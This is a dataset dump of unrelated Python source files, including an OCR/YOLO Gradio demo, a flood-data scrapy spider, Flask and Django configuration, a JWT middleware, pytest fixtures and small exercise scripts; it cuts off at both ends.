t0:.3f}s)')\ndef get_iou(pred_box, gt_box):\n \"\"\"\n pred_box : the coordinate for predict bounding box\n gt_box : the coordinate for ground truth bounding box\n return : the iou score\n the left-down coordinate of pred_box:(pred_box[0], pred_box[1])\n the right-up coordinate of pred_box:(pred_box[2], pred_box[3])\n \"\"\"\n # 1.get the coordinate of inters\n ixmin = max(pred_box[0], gt_box[0])\n ixmax = min(pred_box[2], gt_box[2])\n iymin = max(pred_box[1], gt_box[1])\n iymax = min(pred_box[3], gt_box[3])\n\n iw = np.maximum(ixmax-ixmin+1., 0.)\n ih = np.maximum(iymax-iymin+1., 0.)\n\n # 2. calculate the area of inters\n inters = iw*ih\n\n # 3. calculate the area of union\n uni = ((pred_box[2]-pred_box[0]+1.) * (pred_box[3]-pred_box[1]+1.) +\n (gt_box[2] - gt_box[0] + 1.) * (gt_box[3] - gt_box[1] + 1.) -\n inters)\n\n # 4. calculate the overlaps between pred_box and gt_box\n iou = inters / uni\n\n return iou\n#Visualize____________________\ndef visualize_pred(imgtest,image_name):\n if os.path.exists(\"./Results/data.json\"):\n data=json.load(open('./Results/data.json'))\n for k,v in data[image_name].items():\n bbox= v['box']\n bbox = np.array([[int(float(i)) for i in coord] for coord in bbox])\n # print(k)\n try:\n label= v['trans']\n except:\n label=' '\n bbox_= bbox.reshape((-1,1,2))\n cv2.polylines(imgtest,[bbox_],True,(0,0,255))\n imgtest=Image.fromarray(imgtest)\n draw = ImageDraw.Draw(imgtest)\n draw.text((bbox[0][0],bbox[0][1]),label, font = font,fill=(0,0,255,255))\n imgtest = np.array(imgtest)\n #visualize output frame: YOLO\n if os.path.exists(\"./runs/detect/exp/labels/temp.txt\"):\n data=open(\"./runs/detect/exp/labels/temp.txt\",'r')\n\n boxes=[]\n for i in data:\n x=i.rstrip().split(' ')[1:5]\n boxes.append([int(x[0])+1625, int(x[1])+785, int(x[2])+1625, int(x[3])+785])\n res = np.zeros(len(boxes),dtype=int)\n color=0\n final={}\n for i in range (len(boxes)-1):\n if(res[i]==0):\n color+=1\n res[i]=color\n final[str(res[i])]=[boxes[i]]\n for j in range (i+1,len(boxes)):\n iou=get_iou(boxes[i],boxes[j])\n if (iou>=0.1 and res[i]!=res[j]):\n res[j]=res[i]\n final[str(res[i])].append(boxes[j])\n if (str(res[-1]) in final):\n final[str(res[-1])].append(boxes[-1])\n else:\n final[str(res[-1])]=[boxes[-1]]\n for k,v in final.items():\n if(len(v)>1):\n pts=[]\n v=np.array(v)\n # c1=(int(np.mean(v[:,0])),int(np.mean(v[:,1])))\n # c2=(int(np.mean(v[:,2])),int(np.mean(v[:,3])))\n x_cen=int((int(np.mean(v[:,0]))+int(np.mean(v[:,2])))/2)\n y_cen=int((int(np.mean(v[:,1]))+int(np.mean(v[:,3])))/2)\n # cv2.rectangle(imgtest, c1, c2, (0,0,255), thickness=2, lineType=cv2.LINE_AA)\n cv2.putText(imgtest, '!!!', (x_cen,y_cen), cv2.FONT_HERSHEY_SIMPLEX,1, (0,0,255), 2, cv2.LINE_AA)\n for x in boxes:\n c1, c2 = (x[0], x[1]), (x[2], x[3])\n cv2.rectangle(imgtest, c1, c2, (0,255,255), thickness=1, lineType=cv2.LINE_AA)\n return imgtest\n#MAIN_________________________________\n\ncraft_net,craft_refine_net,craft_args=load_detection_model()\nrecognizer=load_recognition_model()\nopt,model,stride=load_yolo()\nfontpath = \"./arial.ttf\" # <== download font\nfont = ImageFont.truetype(fontpath, 20)\ndef sepia(Infer_from_Video,InputVideo,Infer_from_Image,InputImage):\n videoFile=InputVideo\n ImageFile=InputImage\n outputImage=InputImage\n if os.path.exists(\"./output.mp4\"):\n os.remove(\"./output.mp4\")\n \n # videoFile=input(\"Input video_path (type 'ESC' to exit!) :\")\n\n #get 1 frame per second\n # videoFile = \"/content/LoLstream_test2.mp4\"\n # imagesFolder = \"./frames\"\n # if not os.path.isdir(imagesFolder):\n # os.mkdir(imagesFolder)\n if (Infer_from_Video == False):\n shutil.copy(InputVideo,\"./output.mp4\")\n outputVideo=\"./output.mp4\"\n else:\n cap = cv2.VideoCapture(videoFile)\n frameRate = cap.get(5) #frame rate\n width = int(cap.get(3)) # float `width`\n height = int(cap.get(4))\n size=(width, height)\n image_name=\"0\"\n fps=20\n # cv2.VideoWriter_fourcc(*'MP4V')\n writer = cv2.VideoWriter('output.mp4',cv2.VideoWriter_fourcc(*'mp4v'), 20, size)\n # writer = cv2.VideoWriter('output.avi',cv2.VideoWriter_fourcc(*'XVID'), 20, size)\n while(cap.isOpened()):\n frameId = cap.get(1) #current frame number\n ret, frame = cap.read()\n if (ret != True):\n break\n \n if (frameId % math.floor(frameRate) == 0):\n # imgtest = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n imgtest=frame\n # imgtest=Image.fromarray(frame)\n # imgtest = imgtest[:,:,::-1]\n # imgtest.save(\"./temp1.jpg\")\n image_name=str(int(frameId))\n print('frame id: ',image_name)\n # if not os.path.isdir('./temp'):\n # os.mkdir('./temp')\n # cv2.imwrite(\"./temp/\"+image_name+\".jpg\", imgtest)\n\n infer_detection(imgtest,image_name,craft_net,craft_refine_net,craft_args)\n crop_OCR(recognizer, imgtest,image_name)\n\n # minimap=imgtest.crop((1625, 785, 1920, 1080))\n minimap = imgtest[785:1080, 1625:1920]\n cv2.imwrite(\"./temp.jpg\", minimap)\n # minimap.save(\"./temp.jpg\")\n opt.source=\"./temp.jpg\"\n detect(opt,model,stride,save_img=False)\n fps=20\n #visualize output frame: OCR\n if (fps>0):\n imgtest=visualize_pred(frame,image_name)\n writer.write(imgtest)\n fps-=1\n if os.path.exists(\"./temp.jpg\"):\n os.remove(\"./temp.jpg\")\n if os.path.exists(\"./runs\"):\n shutil.rmtree(\"./runs\")\n cap.release()\n writer.release()\n outputVideo=\"./output.mp4\"\n\n if (Infer_from_Image == True):\n imgtest=ImageFile\n # imgtest = cv2.cvtColor(imgtest, cv2.COLOR_BGR2RGB)\n image_name=\"img_infer\"\n infer_detection(imgtest,image_name,craft_net,craft_refine_net,craft_args)\n crop_OCR(recognizer, imgtest,image_name)\n\n # minimap=imgtest.crop((1625, 785, 1920, 1080))\n minimap = imgtest[785:1080, 1625:1920]\n cv2.imwrite(\"./temp.jpg\", minimap)\n # minimap.save(\"./temp.jpg\")\n opt.source=\"./temp.jpg\"\n detect(opt,model,stride,save_img=False)\n imgtest=visualize_pred(imgtest,image_name)\n cv2.imwrite(\"./img_pred.jpg\", imgtest)\n outputImage=imgtest\n if os.path.exists(\"./temp.jpg\"):\n os.remove(\"./temp.jpg\")\n if os.path.exists(\"./runs\"):\n shutil.rmtree(\"./runs\")\n print(\"Done!\")\n print(\"OUTPUT:------------\",outputVideo,outputImage.shape)\n return [outputVideo, outputImage]\ninputt=[gr.inputs.Checkbox(label=\"Infer_from_Video\"),gr.inputs.Video(label=\"InputVideo\"),gr.inputs.Checkbox(label=\"Infer_from_Image\"),gr.inputs.Image(label=\"InputImage\")]\nsamples=[[\"LoLstream_test6.mp4\",\"img.png\"]]\ndes=\"*Hướng dẫn:\\n \\t* tick chọn checkbox Infer_from_Video/Image tương ứng để chạy Inference.\\n \\t* Lưu ý: InputVideo và InputImage phải được điền vào ngay cả khi không tick chọn checkbox \\n \\t * InputVideo và InputImage phải có độ phân giải 1920x1080\"\niface = gr.Interface(fn=sepia,inputs=inputt,outputs=[gr.outputs.Video(label=\"OutputVideo\"),gr.outputs.Image(label=\"OutputImage\")],verbose=True,interpretation=\"default\",description=des)\n# iface = gr.Interface(fn=sepia,inputs=gr.inputs.Video(label=\"Input Video\"),outputs=gr.outputs.Video(label=\"Output Video\"),examples=samples,interpretation=\"default\")\n# iface = gr.Interface(fn=sepia,inputs=gr.inputs.Image(),outputs=\"text\")\niface.launch(debug=True,share=True)\n# input(\"Running....\")\n","sub_path":"inferenceUI.py","file_name":"inferenceUI.py","file_ext":"py","file_size_in_byte":23835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"646633383","text":"# !/usr/bin/python\n\n\"\"\"\n-----------------------------------------------\nOvid's Creation of Data..\n\nWritten By: Colton Fetters\nVersion: 1.3\nFirst release: 12/2017\n\n-----------------------------------------------\nDEVELOPER NOTES: Small Notes\n\n Version History:\n v1.3: added transcribe capabilities\n v1.2: documentation standardization\n v1.1: added ability to copy content of a directory\n v1.0: initial release\n\"\"\"\n\n# Import module\nimport os\nimport shutil\n\n# Import package\nimport transcribe\n\n\nclass Core(object):\n \"\"\"\n Writing out directories\n \"\"\"\n transcripts = transcribe.Core(loggingName='author', level='info')\n LOGGER = transcripts.logger\n\n def __init__(self, directory=None):\n self._TITLE = os.path.splitext(os.path.basename(__file__))[0]\n self._DIRECTORY = directory\n self._VERSION = 1.3\n self.LOGGER.debug('Object Version {number} has Been Created'.format(number=self._VERSION))\n\n def set_directory(self, directoryPath=None):\n \"\"\"[Creates Folder Directory]\n\n [Creates folder directory based on the file path give to the class]\n\n Parameters\n ----------\n directoryPath : {[String]}\n [Directory passed through Method]\n\n Returns\n -------\n [bool]\n [Weather the folder has been created and or exists]\n \"\"\"\n if directoryPath:\n path = os.path.abspath(directoryPath)\n\n elif self._DIRECTORY:\n path = os.path.abspath(self._DIRECTORY)\n\n else:\n self.LOGGER.warning('No Directory Supplied')\n return None\n\n folderStatus = os.path.exists(os.path.normpath(os.path.abspath(path)))\n\n if not folderStatus:\n try:\n os.mkdir(os.path.normpath(os.path.abspath(path)))\n self.LOGGER.debug('Directory Created {path}'.format(path=os.path.abspath(path)))\n\n except WindowsError:\n self.LOGGER.warning('Could Not Create {path}'.format(path=os.path.abspath(path)))\n\n except OSError:\n self.LOGGER.warning('Could Not Create {path}'.format(path=os.path.abspath(path)))\n\n finally:\n if not (os.path.exists(os.path.normpath(os.path.abspath(path)))):\n os.makedirs((os.path.normpath(os.path.abspath(path))))\n self.LOGGER.info('Directory Created Multiple Folders in {path}'.format(path=os.path.abspath(path)))\n\n return os.path.abspath(path)\n\n def file_copy(self, sourcePath, destinationPath):\n \"\"\"[Copy Content Directory into Another]\n\n [Transfers individual files from on directory to the next]\n\n Parameters\n ----------\n sourcePath : {[String]}\n [Directory Path]\n\n destinationPath : {[String]}\n [Directory Path]\n \"\"\"\n for item in os.listdir(os.path.abspath(sourcePath)):\n\n sourceFile = os.path.join(sourcePath, item)\n\n destinationFile = os.path.join(destinationPath, item)\n\n if os.path.isfile(os.path.abspath(sourceFile)):\n\n shutil.copy2(os.path.abspath(sourceFile), os.path.abspath(destinationFile))\n\n self.LOGGER.debug('Copied {source} to {destination}'.format(source=os.path.abspath(sourceFile),\n destination=os.path.abspath(destinationFile)))\n\n\ndef main():\n objectCore = Core()\n objectCore.LOGGER.info('Successful Import!')\n return objectCore\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"author.py","file_name":"author.py","file_ext":"py","file_size_in_byte":3605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"110180822","text":"from room import Room\nfrom player import Player\nfrom world import World\nfrom util import Stack\n\n\nimport random\nfrom ast import literal_eval\n\n# Load world\nworld = World()\n\n\n# You may uncomment the smaller graphs for development and testing purposes.\n# map_file = \"maps/test_line.txt\"\n# map_file = \"maps/test_cross.txt\"\n# map_file = \"maps/test_loop.txt\"\n# map_file = \"maps/test_loop_fork.txt\"\nmap_file = \"maps/main_maze.txt\"\n\n# Loads the map into a dictionary\nroom_graph = literal_eval(open(map_file, \"r\").read())\nworld.load_graph(room_graph)\n\n# Print an ASCII map\nworld.print_rooms()\n\nplayer = Player(world.starting_room)\n\n# Fill this out with directions to walk\n# traversal_path = ['n', 'n']\ntraversal_path = []\n\n\ndef populate_seen(g, current_room):\n exits = current_room.get_exits()\n g[current_room.id] = {}\n\n for exit in exits:\n g[current_room.id][exit] = '?'\n # print(g)\n\n\ndef get_opposites(direction):\n # save our route back to unvisited exits\n if direction == 'n':\n return 's'\n elif direction == 's':\n return 'n'\n elif direction == 'e':\n return 'w'\n elif direction == 'w':\n return 'e'\n\n\ns = Stack()\nvisited = set()\n\nseen = dict()\n# populate seen dict with initial room\npopulate_seen(seen, player.current_room)\n\n# while loop will terminate when each room has been added to visited set\nwhile len(visited) < len(world.rooms):\n exits = player.current_room.get_exits()\n\n path = []\n for direction in exits:\n # check if exits in visited, add to path\n if player.current_room.get_room_in_direction(direction) not in visited and direction is not None:\n path.append(direction)\n\n # add to visited and populate seen dict\n visited.add(player.current_room)\n populate_seen(seen, player.current_room)\n\n # if there are directions in the path, pick one and travel\n if len(path) > 0:\n # pick random direction\n nxt = random.randint(0, len(path) - 1)\n # add to traversal path and stack\n traversal_path.append(path[nxt])\n s.push(path[nxt])\n # move player\n player.travel(path[nxt])\n else: # travel backward\n last = s.pop()\n player.travel(get_opposites(last))\n traversal_path.append(get_opposites(last))\n\n# print(seen)\n\nprint('===================')\nprint(traversal_path)\nprint('===================')\n\n\n# TRAVERSAL TEST\nvisited_rooms = set()\nplayer.current_room = world.starting_room\nvisited_rooms.add(player.current_room)\n\nfor move in traversal_path:\n player.travel(move)\n visited_rooms.add(player.current_room)\n\nif len(visited_rooms) == len(room_graph):\n print(\n f\"TESTS PASSED: {len(traversal_path)} moves, {len(visited_rooms)} rooms visited\")\nelse:\n print(\"TESTS FAILED: INCOMPLETE TRAVERSAL\")\n print(f\"{len(room_graph) - len(visited_rooms)} unvisited rooms\")\n\n\n#######\n# UNCOMMENT TO WALK AROUND\n#######\n# player.current_room.print_room_description(player)\n# while True:\n# cmds = input(\"-> \").lower().split(\" \")\n# if cmds[0] in [\"n\", \"s\", \"e\", \"w\"]:\n# player.travel(cmds[0], True)\n# elif cmds[0] == \"q\":\n# break\n# else:\n# print(\"I did not understand that command.\")\n","sub_path":"projects/adventure/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"552547278","text":"import os, logging, sys\nfrom flask import Flask\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask.ext.login import LoginManager\nfrom flask_debugtoolbar import DebugToolbarExtension\n\n# set up logging\n# see http://wiki.pylonshq.com/display/pylonscookbook/Alternative+logging+configuration\nlogging.basicConfig(\n stream=sys.stdout,\n level=logging.DEBUG,\n format='[%(process)d] %(levelname)8s %(threadName)30s %(name)s - %(message)s'\n)\nlogger = logging.getLogger(\"tiwebapp\")\n\n\n# set up application\napp = Flask(__name__)\n\n# allow slashes and end of URLs even when they're not part of views:\n# http://flask.pocoo.org/mailinglist/archive/2011/2/27/re-automatic-removal-of-trailing-slashes/#043b1a0b6e841ab8e7d38bd7374cbb58\napp.url_map.strict_slashes = False\n\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = os.getenv(\"DATABASE_URL\")\ndb = SQLAlchemy(app)\n\nlogin_manager = LoginManager()\nlogin_manager.setup_app(app)\n\n\n# set up configs\n\n# Set env PACK_ASSETS=True to pack/minimize assets.\n# Set env PACK_ASSETS=False (default) to keep them in separate files.\n# Production should be PACK_ASSETS=True\napp.config[\"ASSETS_DEBUG\"] = (os.getenv(\"PACK_ASSETS\") != \"True\")\n\napp.config[\"SECRET_KEY\"] = os.getenv(\"SECRET_KEY\")\n\n# set up Flask-DebugToolbar\nif (os.getenv(\"FLASK_DEBUG\", False) == \"True\"):\n logger.info(\"Setting app.debug=True; Flask-DebugToolbar will display\")\n app.debug = True\n app.config[\"DEBUG_TB_INTERCEPT_REDIRECTS\"] = False \ntoolbar = DebugToolbarExtension(app)\n\n# set up views\nfrom totalimpactwebapp import views\n","sub_path":"totalimpactwebapp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"566491245","text":"# Curso em Vídeo Python 3 - Exercicio 37\n# Conversão de um número inteiro para binário, hexadecimal ou octal\n\nnum = int(input('Digite o número: '))\nbase = int(input('''Insira a base desejada para conversão:\n( 1 ) Binário\n( 2 ) Octal\n( 3 ) Hexadecimal\\n'''))\n\nif base == 1:\n print('O número {} em binário é: {}'.format(num, bin(num)[2:]))\nelif base == 2:\n print('O número {} na base octal é: {}'.format(num, oct(num)[2:]))\nelif base == 3:\n print('O número {} na base hexadecimal é: {}'.format(num, hex(num)[2:]))\n","sub_path":"Mundo 2/Exercicios/ex037.py","file_name":"ex037.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"294922652","text":"import scrapy\nfrom scrapy.crawler import CrawlerProcess\nimport pandas as pd\nfrom unidecode import unidecode\nimport datetime\n\n\nclass CGESpider(scrapy.Spider):\n \n name = \"cge_spider\"\n \n def start_requests(self):\n self.index = 0\n\n # Get the current day and work backwards; set the number of days to be retrieved\n today = datetime.datetime.today()\n years = 20\n numDays = 365*years\n\n for dayIncrement in range(0, numDays):\n date = today - datetime.timedelta(days=dayIncrement)\n url = 'https://www.cgesp.org/v3/alagamentos.jsp?dataBusca={}%2F{}%2F{}&enviaBusca=Buscar'.format(date.day,\n date.month,\n date.year)\n yield scrapy.Request(url=url, callback=self.parse)\n \n def parse(self, response):\n \"\"\"\n Extracts the date, time, region(neighborhood), location, direction, reference, and status (transitavel/intransitavel) from a given url (cgesp.org)\n :param response: scrapy object\n :return:\n \"\"\"\n date = response.xpath('//input[@id=\"campoBusca\"]/@value').extract_first()\n regions_list = response.xpath('//table[@class=\"tb-pontos-de-alagamentos\"]')\n for region in regions_list:\n region_name = self.get_name(region)\n flood_points_list = self.get_flood_pts_list(region)\n for flood_point in flood_points_list:\n time, location = self.get_time_and_loc(flood_point)\n direction, reference = self.get_dir_and_ref(flood_point)\n state = self.get_state(flood_point)\n # Use unicode so special characters won't cause problems in the future\n df_to_export.loc[df_to_export.shape[0] + 1] = [unidecode(date), unidecode(region_name), unidecode(time),\n unidecode(location), unidecode(direction),\n unidecode(reference), unidecode(state)]\n\n def get_name(self, region):\n \"\"\"\n Get the name of the region/neighborhood of flooding\n :param region: scrapy response object (that contains the region/neighborhood)\n :return: name of the region\n \"\"\"\n return region.xpath('.//td[@class=\"bairro arial-bairros-alag linha-pontilhada\"]/text()').extract_first().strip()\n\n def get_flood_pts_list(self, region):\n \"\"\"\n Get the flooding points within a certain region\n :param region: scrapy response object (that contains the region/neighborhood)\n :return: int - number of points\n \"\"\"\n return region.xpath('.//div[@class=\"ponto-de-alagamento\"]')\n\n def get_time_and_loc(self, flood_point):\n \"\"\"\n Get the time and location (respectively) in which there were floods\n :param flood_point: scrapy response object (that contains the specific point of flooding)\n :return: str - time range for flooding and location, respectively\n \"\"\"\n time_location_list = flood_point.xpath('.//li[@class=\"arial-descr-alag col-local\"]/text()').extract()\n return time_location_list[0], time_location_list[1]\n\n def get_dir_and_ref(self, flood_point):\n \"\"\"\n Get the direction and reference (respectively) of floods\n :param flood_point: scrapy response object (that contains the specific point of flooding)\n :return: str - direction and reference (respectively) of flood points\n \"\"\"\n direction_reference_list = flood_point.xpath('.//li[@class=\"arial-descr-alag\"]/text()').extract()\n return direction_reference_list[0], direction_reference_list[1]\n\n def get_state(self, flood_point):\n \"\"\"\n Get the state of flood point (transitavel/intransitavel)\n :param flood_point: scrapy response object (that contains the specific point of flooding)\n :return: str - state (transitavel/intransitavel)\n \"\"\"\n if flood_point.xpath('.//li[@class=\"inativo-transitavel\"]').extract():\n return flood_point.xpath('.//li[@class=\"inativo-transitavel\"]/@title').extract_first()\n elif flood_point.xpath('.//li[@class=\"inativo-intransitavel\"]').extract():\n return flood_point.xpath('.//li[@class=\"inativo-intransitavel\"]/@title').extract_first()\n else:\n # Sanity check\n return \"No information. Check.\"\n\n\n# Script ran on root directory\nfilename = './Data/CGE/Datafloods.csv'\ndf_to_export = pd.DataFrame(columns=['Date', 'Region', 'Time', 'Location', 'Direction', 'Reference', 'State'])\nprocess = CrawlerProcess()\nprocess.crawl(CGESpider)\nprocess.start()\n\ndf_to_export.to_csv(filename, index=False)\n","sub_path":"Scripts/01_Data_Aquisition/CGE_spider.py","file_name":"CGE_spider.py","file_ext":"py","file_size_in_byte":4883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"59052388","text":"from .base import *\n\n\nINSTALLED_APPS += [\"rest_framework_swagger\"]\n\nif os.getenv(\"DEBUG_TOOLBAR\", \"false\").lower() in (\"true\", \"1\", \"on\"):\n INSTALLED_APPS += [\"debug_toolbar\"]\n\n MIDDLEWARE = [\"debug_toolbar.middleware.DebugToolbarMiddleware\", *MIDDLEWARE]\n\n INTERNAL_IPS = [\"127.0.0.1\"]\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nCELERY_TASK_ALWAYS_EAGER = True\n\nSITE_URL = os.getenv(\"SITE_URL\", \"http://127.0.0.1:8000\")\nDEALS_CITIES = [\"DFW\", \"NYC\", \"LAX\"]\n\nDEALS_INTERNATIONAL = [\"PEK\", \"LHR\", \"HND\"]\n\nCORS_ORIGIN_ALLOW_ALL = True\nREPORT_RECEIVERS = [os.getenv(\"REPORT_RECEIVER\", \"user@example.com\")]\n","sub_path":"wanderift/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"297675136","text":"# 阶跃信号\nimport numpy as np\nimport matplotlib.pyplot as plt\n#定义阶跃信号where(condition,[x,y])\ndef unit(t):\n r=np.where(t>0.0,1.0,0.0)\n return r\nt=np.linspace(-1.0,5.0,1000)\nplt.ylim(-1.0,3.0)\nplt.plot(t,unit(t))\nplt.title('aaa')\nplt.show()","sub_path":"信系(阶跃信号).py","file_name":"信系(阶跃信号).py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"92721126","text":"import pytest\nimport config\nfrom engine import Engine\n\n\n@pytest.fixture(scope='session')\ndef eng():\n eng = Engine()\n yield eng\n eng.close()\n\nbackends = {}\nif \"gdb\" in config.config:\n backends['gdb'] = {\n 'name': 'gdb',\n 'launch': ' dd\\n',\n 'tbreak_main': 'tbreak main\\n',\n 'break_main': 'break main\\n',\n 'break_bar': 'break Bar\\n',\n 'launchF': ':GdbStart gdb -q {}\\n',\n }\nif \"lldb\" in config.config:\n backends['lldb'] = {\n 'name': 'lldb',\n 'launch': ' dl\\n',\n 'tbreak_main': 'breakpoint set -o true -n main\\n',\n 'break_main': 'breakpoint set -n main\\n',\n 'break_bar': 'breakpoint set --fullname Bar\\n',\n 'launchF': ':GdbStartLLDB lldb {}\\n',\n }\n\n@pytest.fixture(scope=\"function\")\ndef post(eng):\n while eng.eval(\"tabpagenr('$')\") > 1:\n eng.exe('tabclose $')\n yield\n eng.exe(\"GdbDebugStop\")\n assert 1 == eng.eval(\"tabpagenr('$')\")\n assert {} == eng.getSigns()\n\n@pytest.fixture(scope=\"function\", params=backends.values())\ndef backend(post, request):\n yield request.param\n\n@pytest.fixture(scope=\"function\")\ndef two_backends(post):\n it = iter(backends.values())\n b1 = next(it)\n b2 = next(it, b1)\n yield b1, b2\n","sub_path":"test/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"530991394","text":"# -*- coding:UTF-8 -*-\r\n\r\n'''\r\n找出整型数组里除了两个数字以外,其它都出现了两次。要求时间复杂度是O(n) 空间复杂度是 O(1)\r\n'''\r\n\r\n\r\nclass Solution(object):\r\n def dp_probability(self, n, sum, dmax=6, dmin=1):\r\n if sum < n * dmin or sum > n * dmax:\r\n return 0\r\n dp1 = [0] * (n * dmax + 1)\r\n # init dp[1, :]\r\n for i in range(1, dmax + 1):\r\n dp1[i] = 1\r\n # i: the number of dices\r\n for i in range(2, n + 1):\r\n dp2 = [0] * (n * dmax + 1)\r\n # j: range of i dices\r\n for j in range(dmin * i, dmax * i + 1):\r\n # k: range of new added dice\r\n for k in range(dmin, dmax + 1):\r\n if j > k:\r\n dp2[j] += dp1[j - k]\r\n print(dp2)\r\n dp1 = dp2\r\n print(\"total = {0}, prob = {1}%\".format(dp2[sum], dp2[sum] * 100 / dmax ** n))\r\n return dp2[sum]\r\n\r\n def dicePro(self, target, num):\r\n tmpArr1 = [0 for x in range(6 * num + 1)]\r\n\r\n for x in range(1, 7):\r\n tmpArr1[x] = 1\r\n flag = 0\r\n for i in range(2, num + 1):\r\n tmpArr2 = [0 for x in range(6 * num + 1)]\r\n for j in range(i, i * 6 + 1):\r\n for k in range(1, 7):\r\n if j > k:\r\n tmpArr2[j] += tmpArr1[j - k]\r\n flag = 1\r\n # else:\r\n # for j in range(i, i * 6 + 1):\r\n # for k in range(1, 7):\r\n # if j > k:\r\n # tmpArr1[j] += tmpArr2[j - k]\r\n # flag = 0\r\n tmpArr1 = tmpArr2\r\n\r\n print(tmpArr1)\r\n print(tmpArr2)\r\n print(\"total = {0}, prob = {1}%\".format(tmpArr2[target], tmpArr2[target] * 100 / 6 ** num))\r\n\r\n return tmpArr1[target]\r\n # > tmpArr1[target - 1] ? tmpArr2[target - 1]: tmpArr1[target - 1]\r\n\r\n\r\nif __name__ == '__main__':\r\n nums = [1, 2, 4, 7, 11, 15]\r\n # nums = []\r\n target = \"I am a student.\"\r\n tar = \"abcdefg\"\r\n print(Solution().dicePro(18, 3))\r\n # print(Solution().dp_probability(3, 18))\r\n","sub_path":"CodeOffer/DicePro.py","file_name":"DicePro.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"507033675","text":"# 11-3 雇员 :\n# 编写一个名为Employee 的类,其方法__init__() 接受名、姓和年薪,并将它们都存储在属性中。\n# 编写一个名为give_raise() 的方法,它默认将年薪增加5000美元,但也能够接受其他的年薪增加量。\n# 为Employee 编写一个测试用例,其中包含两个测试方法:test_give_default_raise() 和test_give_custom_raise() 。\n# 使用方法setUp() ,以免在每个测试方法中都创建新的雇员实例。运行这个测试用例,确认两个测试都通过了。\nimport unittest\nfrom employee import Employee\n\n\nclass TestEmployee(unittest.TestCase):\n \"\"\"TestEmployee\"\"\"\n\n def setUp(self):\n self.first = '谭'\n self.last = '旭'\n self.salary = 0\n\n def test_give_default_raise(self):\n \"\"\"验证默认薪资是5000\"\"\"\n eployee_1 = Employee(self.first, self.last, self.salary)\n eployee_1.give_raise()\n salary = eployee_1.show_user_info()\n self.assertEqual(int(salary), 5000)\n\n def test_give_custom_raise(self):\n \"\"\"确定增加1000薪资后是否仍然正确\"\"\"\n eployee_1 = Employee(self.first, self.last, 1000)\n eployee_1.give_raise()\n salary = eployee_1.show_user_info()\n self.assertEqual(int(salary), 6000)\n\n\nunittest.main()\n","sub_path":"Python编程:从入门到实践/第_11_章_测试代码/test_employee.py","file_name":"test_employee.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"583683603","text":"\nfrom werkzeug.wrappers import Request, Response, ResponseStream\nfrom flask import abort, request, make_response, jsonify\nimport json\n\nfrom utils.jwt_util import JWTEncodeDecode\n\nclass RequestUser:\n def __init__(self, app):\n self.app = app\n\n def __call__(self, environ, start_response):\n request = Request(environ)\n jwt_encode_decode = JWTEncodeDecode()\n # if 'Authorization' not in request.headers:\n # # return make_response(jsonify({\"messsage\": \" Token missing\"})), 403\n # res = Response(json.dumps('Authorization failed'), mimetype='application/json', status=401)\n # return res(environ, start_response)\n if 'Authorization' in request.headers:\n payload = None\n environ['user'] = None\n data = request.headers['Authorization']\n token = data.replace('Token ','')\n jwt_data = jwt_encode_decode.decode(token=token)\n if jwt_data['success']:\n payload = jwt_data['data']\n environ['user'] = payload\n return self.app(environ, start_response)\n","sub_path":"middlewarers/login_middleware.py","file_name":"login_middleware.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"244644310","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 23 18:02:49 2019\r\n\r\n@author: maxhu\r\n\"\"\"\r\n\r\n#====================IMPORTS, INITIALIZING, AND HOUSE CLEANING ==============#\r\nimport uControllersFunctions as F\r\nimport RPi.GPIO as GPIO\r\nimport time\r\nimport numpy as np\r\n\r\ndef initial():\r\n import uControllersFunctions as F\r\n import RPi.GPIO as GPIO\r\n import time\r\n import numpy as np\r\n \r\n CONREL = 18\r\n C = 0\r\n CS = 32\r\n CLK = 12\r\n DOUT = 40\r\n DIN = 38\r\n FAN = 22\r\n#============================================================================#\r\n ref = 3.304\r\n#============================================================================#\r\n GPIO.setmode(GPIO.BOARD)\r\n GPIO.setup(CS, GPIO.OUT)\r\n GPIO.setup(CLK, GPIO.OUT)\r\n GPIO.setup(DOUT, GPIO.IN)\r\n GPIO.setup(DIN, GPIO.OUT)\r\n GPIO.setup(CONREL,GPIO.OUT)\r\n GPIO.setup(FAN,GPIO.OUT)\r\n#============================================================================#\r\n freq = 1\r\n T_set = 30\r\n del_t = 0\r\n \r\n prop_w_cool = []\r\n time_w_cool = []\r\n del_t_w_cool = 0\r\n \r\n prop_wo_cool = []\r\n time_wo_cool = []\r\n del_t_wo_cool = 0\r\n \r\n bang_bang = []\r\n time_bang = []\r\n del_t_bang = 0\r\n#============================================================================#\r\n my_pwm_relay = GPIO.PWM(CONREL, freq)\r\n my_pwm_fan = GPIO.PWM(FAN, freq)\r\n duty 